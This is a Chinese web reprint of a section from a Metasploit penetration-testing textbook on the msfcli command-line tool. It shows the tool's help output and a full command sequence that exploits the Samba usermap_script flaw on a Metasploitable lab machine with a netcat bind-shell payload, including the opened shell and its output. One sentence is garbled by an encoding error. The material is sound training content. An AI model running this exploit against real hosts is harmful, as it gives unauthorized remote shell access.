频道栏目
读书频道 > 安全 > Metasploit渗透测试魔鬼训练营
1.6.3 msfcli命令行程序
2020-09-22 13:27:43     我来说两句
收藏   我要投稿
全书共10章。第1章对渗透测试和Metasploit进行了系统介绍,首先介绍了渗透测试的分类、方法、流程、过程环节等,然后介绍了Metasploit的功能、结构和基本的使用方法。第2章详细演示了渗透测试实验环境的搭建。第  立即去当当网订购

“最后让我们尝试msfcli命令行程序的使用接口,这个接口让我们能够在Shell命令行里完成一次完整的渗透攻击过程”,技术总监继续熟练地演示着Metasploit的使用方法。

msfcli命令行程序是Metasploit框架为脚本自动化处理及与其他命令行工具互操作而设计的一种用户接口,它可以直接从命令行Shell执行,并允许你通过Linux的管道机制将结果输出重定向给其他程序进行处理。当你需要针对一个网络中的大量系统进行同一安全漏洞的渗透测试与检查,msfcli将是特别适用的Metasploit框架调用接口,你可以针对一个系统配置好msfcli的命令行参数,然后写一段简单的Shell脚本来对一组IP地址进行依次测试,并将结果输出到日志文件中以供查询和进一步分析。

msfcli命令行程序的使用方法使用-h选项进行显示,如下:

root@bt:~# msfcli -h

Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]

====================================================================

    Mode          Description

    (H)elp      You're looking at it baby!             #帮助信息,你现在看的就是啊

    (S)ummary   Show information about this module        #显示关于该模块详细信息

    (O)ptions   Show available options for this module         #显示所有配置选项

    (A)dvanced  Show available advanced options for this module

#显示该模块的所有高级配置选项

    (I)DS Evasion  Show available ids evasion options for this module

#显示该模块的可用IDS逃逸选项

    (P)ayloads     Show available payloads for this module

#显示该模块适用的攻击载荷

    (T)argets      Show available targets for this exploit module

#显示渗透攻击模块的所有攻击目标类型

    (AC)tions      Show available actions for this auxiliary module

#显示辅助模块的所有可用动作

    (C)heck        Run the check routine of the selected module

#运行选定模块的检查例程

    (E)xecute      Execute the selected module            #运行选定的模块

而使用msfcli命令行实施一次渗透攻击的过程通;岵捎萌缦铝鞒蹋ㄎ颐腔故且訫etasploitable中Samba服务的usermap_script漏洞攻击为例):

msfcli multi/samba/usermap_script S:对选定的渗透攻击模块显示详细信息。

msfcli multi/samba/usermap_script P:查看可用的攻击载荷。

msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat O:选择一个攻击载荷,并查看需要设置的配置参数。

msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat T:查看渗透攻击模块的目标类型列表。

以option=value方式设置所需要设置的配置参数,并以E模式来执行这次渗透攻击。

下面我们在msfcli命令行中,重复一次对Metasploitable靶机的渗透攻击,命令如下:

root@bt:~# msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/

bind_netcat RHOST=10.10.10.254 E

[*] Please wait while we load the module tree…

   …SNIP…

PAYLOAD => cmd/unix/bind_netcat

RHOST => 10.10.10.254

[*] Started bind handler

[*] Command shell session 1 opened (10.10.10.128:56139 -> 10.10.10.254:4444) at 2020-09-22 11:18:18 -0400

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

相比较于MSF终端,msfcli命令行程序的弱点在于所支持的功能特性较少,如尚不支持将结果输入到后台数据库中,同时只能处理一个Shell从而使得对客户端攻击不太实用,以及不支持MSF终端中的高级自动化渗透特性(如db_autopwn等)。

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:1.6.2 msfconsole控制台终端
下一篇:1.7 小结
相关文章
图文推荐
排行
热门
最新书评
文章
下载
读书
特别推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 第一门户--致力于做实用的IT技术学习网站